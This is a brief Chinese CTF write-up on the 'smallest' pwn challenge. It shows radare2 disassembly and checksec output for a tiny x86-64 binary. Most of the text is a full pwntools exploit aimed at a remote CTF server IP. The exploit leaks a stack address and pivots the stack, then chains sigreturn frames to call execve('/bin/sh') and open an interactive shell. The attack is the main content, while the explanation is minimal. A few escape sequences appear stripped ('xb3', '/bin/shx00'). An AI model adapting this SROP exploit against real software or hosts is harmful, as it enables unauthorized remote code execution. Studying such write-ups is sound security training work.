以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便
unmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest 00:54:15
Warning: Cannot initialize dynamic strings
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[ ] [*] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan))
0x004000b0
-- WASTED
[0x004000b0]> afl
0x004000b0 1 17 entry0
[0x004000b0]> pdf entry0
;-- section..text:
/ (fcn) entry0 17
| entry0 ();
| 0x004000b0 4831c0 xor rax, rax ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text
| 0x004000b3 ba00040000 mov edx, 0x400 ; 1024
| 0x004000b8 4889e6 mov rsi, rsp
| 0x004000bb 4889c7 mov rdi, rax
| 0x004000be 0f05 syscall
0x004000c0 c3 ret
[0x004000b0]>
源码就这么几行,
junmoxiao@cat ~/s/pd_ubuntu> file smallest 00:54:06
smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
junmoxiao@cat ~/s/pd_ubuntu> checksec smallest 00:54:12
[*] '/Users/junmoxiao/share/pd_ubuntu/smallest'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
junmoxiao@cat ~/s/pd_ubuntu>
最后的exp
#coding:utf-8
from pwn import *
import time
file_name = './smallest'
context.binary = file_name
elf = ELF(file_name)
#context.log_level = 'debug'
syscall_addr = 0x4000be
#p = process(file_name)
p = remote('106.75.93.227', 20000)
#p = remote('106.75.61.55', 20000)
#gdb.attach(p, 'aslr on;b * 0x4000b0')
# ---------------------------------------------------------------------------------
log.info('call read; call write; call read')
payload = p64(0x4000b0)
payload += p64(0x4000b3)
payload += p64(0x4000b0)
p.sendline(payload)
time.sleep(3)
p.send('xb3')
# -------------------------------------------------------------------------------------
# set eax; sigreturn;
leak_data = p.recvn(0x400)
leak_addr = u64(leak_data[0x8:0x8+8])
print "leak_addr: %s" % hex(leak_addr)
stack_addr = leak_addr - 0x1000
print 'stack_start_addr %s' % hex(stack_addr)
binsh_addr = stack_addr + 0x300
print 'binsh_addr: %s' % hex(binsh_addr)
log.info('stack pivot to %s' % hex(stack_addr))
frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = stack_addr
frame.rdx = 0x500
frame.rsp = stack_addr
frame.rip = syscall_addr
payload = p64(0x4000b0) + p64(syscall_addr)
payload += str(frame)
p.sendline(payload)
time.sleep(10)
p.send(payload[8:8+15]) # set eax=sigreturn
time.sleep(5)
log.info('execve')
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh_addr
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0x400300
frame.rip = syscall_addr
payload = p64(0x4000b0) + p64(syscall_addr)
payload += str(frame)
payload += 'a' * (0x300-len(payload)) + '/bin/shx00'
p.sendline(payload)
time.sleep(5)
p.send(payload[8:8+15]) # set eax=sigreturn
p.interactive()